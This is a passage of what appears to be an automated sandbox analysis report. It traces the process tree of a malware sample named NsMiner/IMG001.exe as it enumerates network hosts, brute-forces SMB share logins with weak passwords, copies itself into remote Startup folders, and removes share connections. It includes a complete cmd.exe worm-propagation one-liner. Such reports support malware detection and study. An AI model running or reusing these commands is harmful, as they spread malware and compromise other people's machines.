        C:\Windows\system32\cmd.exe /S /D /c" echo f"
        6⤵
        
        PID:2856
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\Documents and Settings\1\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\C$\Documents and Settings\1\Start Menu\Programs\Startup\IMG001.exe" "
        6⤵
        
        PID:7884
        
        C:\Windows\SysWOW64\xcopy.exe
        
        xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\Documents and Settings\1\Start Menu\Programs\Startup\IMG001.exe"
        7⤵
        
        PID:2808
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo f"
        6⤵
        
        PID:8024
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\Documents and Settings\All Users\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\C$\Documents and Settings\All Users\Start Menu\Programs\Startup\IMG001.exe" "
        6⤵
        
        PID:6952
        
        C:\Windows\SysWOW64\xcopy.exe
        
        xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\Documents and Settings\All Users\Start Menu\Programs\Startup\IMG001.exe"
        7⤵
        
        PID:5656
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo f"
        6⤵
        
        PID:180
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\Documents and Settings\1\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\C$\Documents and Settings\1\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe" "
        6⤵
        
        PID:5084
        
        C:\Windows\SysWOW64\xcopy.exe
        
        xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\Documents and Settings\1\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe"
        7⤵
        
        PID:5692
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo f"
        6⤵
        
        PID:5672
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\Documents and Settings\All Users\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\C$\Documents and Settings\All Users\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe" "
        6⤵
        
        PID:8176
        
        C:\Windows\SysWOW64\xcopy.exe
        
        xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\Documents and Settings\All Users\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe"
        7⤵
        
        PID:4224
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo f"
        6⤵
        
        PID:4468
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\Windows\Profiles\1\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\C$\Windows\Profiles\1\Start Menu\Programs\Startup\IMG001.exe" "
        6⤵
        
        PID:8000
        
        C:\Windows\SysWOW64\xcopy.exe
        
        xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\Windows\Profiles\1\Start Menu\Programs\Startup\IMG001.exe"
        7⤵
        
        PID:2784
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo f"
        6⤵
        
        PID:6480
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\Windows\All Users\Start menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\C$\Windows\All Users\Start menu\Programs\Startup\IMG001.exe" "
        6⤵
        
        PID:5224
        
        C:\Windows\SysWOW64\xcopy.exe
        
        xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\Windows\All Users\Start menu\Programs\Startup\IMG001.exe"
        7⤵
        
        PID:6804
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo f"
        6⤵
        
        PID:2580
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\1\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\C$\1\IMG001.exe" "
        6⤵
        
        PID:2364
        
        C:\Windows\SysWOW64\xcopy.exe
        
        xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\1\IMG001.exe"
        7⤵
        
        PID:6476
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.0.1\C$ /delete /y
        6⤵
        Indicator Removal: Network Share Connection Removal
        
        PID:3396
      - C:\Windows\SysWOW64\PING.EXE
        
        ping -n 20 localhost
        6⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:1536
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo f"
        6⤵
        
        PID:1280
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "
        6⤵
        
        PID:3436
        
        C:\Windows\SysWOW64\xcopy.exe
        
        xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"
        7⤵
        
        PID:6088
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo f"
        6⤵
        
        PID:3316
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "
        6⤵
        
        PID:4164
        
        C:\Windows\SysWOW64\xcopy.exe
        
        xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"
        7⤵
        
        PID:6608
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo f"
        6⤵
        
        PID:2360
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\Users\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "
        6⤵
        
        PID:6112
        
        C:\Windows\SysWOW64\xcopy.exe
        
        xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"
        7⤵
        
        PID:6408
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo f"
        6⤵
        
        PID:2396
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\Users\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "
        6⤵
        
        PID:6340
        
        C:\Windows\SysWOW64\xcopy.exe
        
        xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"
        7⤵
        
        PID:3824
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo f"
        6⤵
        
        PID:4044
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\Users\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "
        6⤵
        
        PID:1572
        
        C:\Windows\SysWOW64\xcopy.exe
        
        xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"
        7⤵
        
        PID:7348
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo f"
        6⤵
        
        PID:1952
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\Documents and Settings\1\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\Users\Documents and Settings\1\Start Menu\Programs\Startup\IMG001.exe" "
        6⤵
        
        PID:2300
        
        C:\Windows\SysWOW64\xcopy.exe
        
        xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\Documents and Settings\1\Start Menu\Programs\Startup\IMG001.exe"
        7⤵
        
        PID:6472
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo f"
        6⤵
        
        PID:7404
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\Documents and Settings\All Users\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\Users\Documents and Settings\All Users\Start Menu\Programs\Startup\IMG001.exe" "
        6⤵
        
        PID:7504
        
        C:\Windows\SysWOW64\xcopy.exe
        
        xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\Documents and Settings\All Users\Start Menu\Programs\Startup\IMG001.exe"
        7⤵
        
        PID:5412
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo f"
        6⤵
        
        PID:2704
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\Documents and Settings\1\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\Users\Documents and Settings\1\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe" "
        6⤵
        
        PID:2832
        
        C:\Windows\SysWOW64\xcopy.exe
        
        xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\Documents and Settings\1\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe"
        7⤵
        
        PID:4868
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo f"
        6⤵
        
        PID:5656
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\Documents and Settings\All Users\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\Users\Documents and Settings\All Users\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe" "
        6⤵
        
        PID:3296
        
        C:\Windows\SysWOW64\xcopy.exe
        
        xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\Documents and Settings\All Users\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe"
        7⤵
        
        PID:5032
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo f"
        6⤵
        
        PID:7256
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\Windows\Profiles\1\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\Users\Windows\Profiles\1\Start Menu\Programs\Startup\IMG001.exe" "
        6⤵
        
        PID:4776
        
        C:\Windows\SysWOW64\xcopy.exe
        
        xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\Windows\Profiles\1\Start Menu\Programs\Startup\IMG001.exe"
        7⤵
        
        PID:1340
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo f"
        6⤵
        
        PID:5084
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\Windows\All Users\Start menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\Users\Windows\All Users\Start menu\Programs\Startup\IMG001.exe" "
        6⤵
        
        PID:5144
        
        C:\Windows\SysWOW64\xcopy.exe
        
        xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\Windows\All Users\Start menu\Programs\Startup\IMG001.exe"
        7⤵
        
        PID:4884
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo f"
        6⤵
        
        PID:1228
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\1\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\Users\1\IMG001.exe" "
        6⤵
        
        PID:552
        
        C:\Windows\SysWOW64\xcopy.exe
        
        xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\1\IMG001.exe"
        7⤵
        
        PID:7056
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.0.1\Users /delete /y
        6⤵
        Indicator Removal: Network Share Connection Removal
        
        PID:648
      - C:\Windows\SysWOW64\PING.EXE
        
        ping -n 20 localhost
        6⤵
        
        PID:5324
      - C:\Windows\SysWOW64\PING.EXE
        
        ping -n 3 localhost
        6⤵
        
        PID:6112
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.0.1\C$ "1" /user:"1"
        6⤵
        
        PID:3040
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.0.1\Users "1" /user:"1"
        6⤵
        
        PID:1664
      - C:\Windows\SysWOW64\PING.EXE
        
        ping -n 3 localhost
        6⤵
        Runs ping.exe
        
        PID:1924
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.0.1\C$ "123" /user:"1"
        6⤵
        
        PID:5640
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.0.1\Users "123" /user:"1"
        6⤵
        
        PID:5484
      - C:\Windows\SysWOW64\PING.EXE
        
        ping -n 3 localhost
        6⤵
        
        PID:6520
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.0.1\C$ "1" /user:"1"
        6⤵
        
        PID:3028
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.0.1\Users "1" /user:"1"
        6⤵
        
        PID:964
      - C:\Windows\SysWOW64\PING.EXE
        
        ping -n 3 localhost
        6⤵
        Runs ping.exe
        
        PID:6252
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.0.1\C$ "1703" /user:"1"
        6⤵
        
        PID:5728
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.0.1\Users "1703" /user:"1"
        6⤵
        
        PID:1464
      - C:\Windows\SysWOW64\PING.EXE
        
        ping -n 3 localhost
        6⤵
        
        PID:704
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.0.1\C$ """" /user:"1"
        6⤵
        
        PID:6904
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.0.1\Users """" /user:"1"
        6⤵
        
        PID:5504
      - C:\Windows\SysWOW64\PING.EXE
        
        ping -n 3 localhost
        6⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:3916
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.0.1\C$ "0" /user:"10.127.0.1"
        6⤵
        
        PID:3620
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.0.1\Users "0" /user:"10.127.0.1"
        6⤵
        
        PID:5540
      - C:\Windows\SysWOW64\PING.EXE
        
        ping -n 3 localhost
        6⤵
        
        PID:3816
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.0.1\C$ "1" /user:"10.127.0.1"
        6⤵
        
        PID:976
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.0.1\Users "1" /user:"10.127.0.1"
        6⤵
        
        PID:5848
      - C:\Windows\SysWOW64\PING.EXE
        
        ping -n 3 localhost
        6⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:6508
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.0.1\C$ "123" /user:"10.127.0.1"
        6⤵
        
        PID:5604
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.0.1\Users "123" /user:"10.127.0.1"
        6⤵
        
        PID:4264
      - C:\Windows\SysWOW64\PING.EXE
        
        ping -n 3 localhost
        6⤵
        
        PID:7412
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.0.1\C$ "10.127.0.1" /user:"10.127.0.1"
        6⤵
        
        PID:6924
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.0.1\Users "10.127.0.1" /user:"10.127.0.1"
        6⤵
        
        PID:3016
      - C:\Windows\SysWOW64\PING.EXE
        
        ping -n 3 localhost
        6⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:6416
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.0.1\C$ "1703" /user:"10.127.0.1"
        6⤵
        
        PID:1952
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.0.1\Users "1703" /user:"10.127.0.1"
        6⤵
        
        PID:6288
      - C:\Windows\SysWOW64\PING.EXE
        
        ping -n 3 localhost
        6⤵
        Runs ping.exe
        
        PID:7688
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.0.1\C$ """" /user:"10.127.0.1"
        6⤵
        
        PID:7996
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.0.1\Users """" /user:"10.127.0.1"
        6⤵
        
        PID:7120
      - C:\Windows\SysWOW64\PING.EXE
        
        ping -n 3 localhost
        6⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:6868
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.0.1\C$ "0" /user:"administrator"
        6⤵
        
        PID:2936
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.0.1\Users "0" /user:"administrator"
        6⤵
        
        PID:6124
      - C:\Windows\SysWOW64\PING.EXE
        
        ping -n 3 localhost
        6⤵
        
        PID:6112
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.0.1\C$ "1" /user:"administrator"
        6⤵
        
        PID:7708
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.0.1\Users "1" /user:"administrator"
        6⤵
        
        PID:7588
      - C:\Windows\SysWOW64\PING.EXE
        
        ping -n 3 localhost
        6⤵
        Runs ping.exe
        
        PID:7060
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.0.1\C$ "123" /user:"administrator"
        6⤵
        
        PID:1904
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.0.1\Users "123" /user:"administrator"
        6⤵
        
        PID:7884
      - C:\Windows\SysWOW64\PING.EXE
        
        ping -n 3 localhost
        6⤵
        
        PID:2580
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.0.1\C$ "administrator" /user:"administrator"
        6⤵
        
        PID:3924
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c taskkill /f /im net.exe & tskill net.exe
        5⤵
        
        PID:5388
      - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im net.exe
        6⤵
        Kills process with taskkill
        
        PID:3816
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /v:on /c @(for /f "usebackq tokens=1" %i in (`@net view^|find /i "\\" ^|^| @arp -a^|find /i " 1"`) do @set str_!random!=%i)& @for /f "usebackq tokens=1* delims==" %j in (`set str_`) do @set s=%k& set s=!s:\\=!& set l=!s:-PC=!& set l=!l:-ÏÊ=!& set f=IMG001.exe& set n=0305& @if not "!s!"=="%COMPUTERNAME%" @echo connect to \\!s! & (for /f "usebackq tokens=1" %j in (`net view \\!s!^|find /i " "`) do @echo f|xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\!s!\%j\!f!" 1>nul && @echo copy to "\\!s!\%j\!f!") & @net use * /delete /y 2>nul & @(for %u in (1 !l! administrator user admin àäìèíèñòðàòîð) do @for %p in (0 1 123 %u !n! "") do @ping -n 3 localhost>nul & @(for %c in (\\!s!\C$ \\!s!\Users) do @echo connect to %c %p %u & @(if not "%p%u"=="01" net use %c "%p" /user:"%u") && @((echo [Section1] & echo p=%p %u)>"C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe:P" & @(for %d in ("%c\All Users\Microsoft\Windows\Start Menu\Programs\Startup\!f!" "%c\%u\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\!f!" "%c\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\!f!" "%c\Users\%u\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\!f!" "%c\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\!f!" "%c\Documents and Settings\%u\Start Menu\Programs\Startup\!f!" "%c\Documents and Settings\All Users\Start Menu\Programs\Startup\!f!" "%c\Documents and Settings\%u\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\!f!" "%c\Documents and Settings\All Users\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\!f!" "%c\Windows\Profiles\%u\Start Menu\Programs\Startup\!f!" "%c\Windows\All Users\Start menu\Programs\Startup\!f!" "%c\%u\!f!" ) do @echo f|@xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" %d 1>nul && @echo copy to %d) & @echo nul>"C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe:P" & net use %c /delete /y 2>nul & @ping -n 20 localhost>nul)))
        5⤵
        Indicator Removal: Network Share Connection Removal
        
        PID:3912
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c @net view|find /i "\\" || @arp -a|find /i " 1"
        6⤵
        Network Service Discovery
        
        PID:5648
        
        C:\Windows\SysWOW64\net.exe
        
        net view
        7⤵
        Discovers systems in the same network
        
        PID:2152
        
        C:\Windows\SysWOW64\find.exe
        
        find /i "\\"
        7⤵
        
        PID:8024
        
        C:\Windows\SysWOW64\ARP.EXE
        
        arp -a
        7⤵
        Network Service Discovery
        
        PID:2460
        
        C:\Windows\SysWOW64\find.exe
        
        find /i " 1"
        7⤵
        
        PID:3528
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c set str_
        6⤵
        
        PID:5796
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c net view \\10.127.255.255|find /i " "
        6⤵
        
        PID:6964
        
        C:\Windows\SysWOW64\net.exe
        
        net view \\10.127.255.255
        7⤵
        Discovers systems in the same network
        
        PID:2816
        
        C:\Windows\SysWOW64\find.exe
        
        find /i " "
        7⤵
        
        PID:4936
      - C:\Windows\SysWOW64\net.exe
        
        net use * /delete /y
        6⤵
        Indicator Removal: Network Share Connection Removal
        
        PID:7380
      - C:\Windows\SysWOW64\PING.EXE
        
        ping -n 3 localhost
        6⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:2236
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo f"
        6⤵
        
        PID:7344
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\C$\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "
        6⤵
        
        PID:7420
        
        C:\Windows\SysWOW64\xcopy.exe
        
        xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"
        7⤵
        
        PID:5464
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo f"
        6⤵
        
        PID:6612
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\C$\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "
        6⤵
        
        PID:1192
        
        C:\Windows\SysWOW64\xcopy.exe
        
        xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"
        7⤵
        
        PID:6336
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo f"
        6⤵
        
        PID:5440
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\C$\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "
        6⤵
        
        PID:6364
        
        C:\Windows\SysWOW64\xcopy.exe
        
        xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"
        7⤵
        
        PID:7056
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo f"
        6⤵
        
        PID:1404
      - C:\Windows\SysWOW64\cmd.exe
        
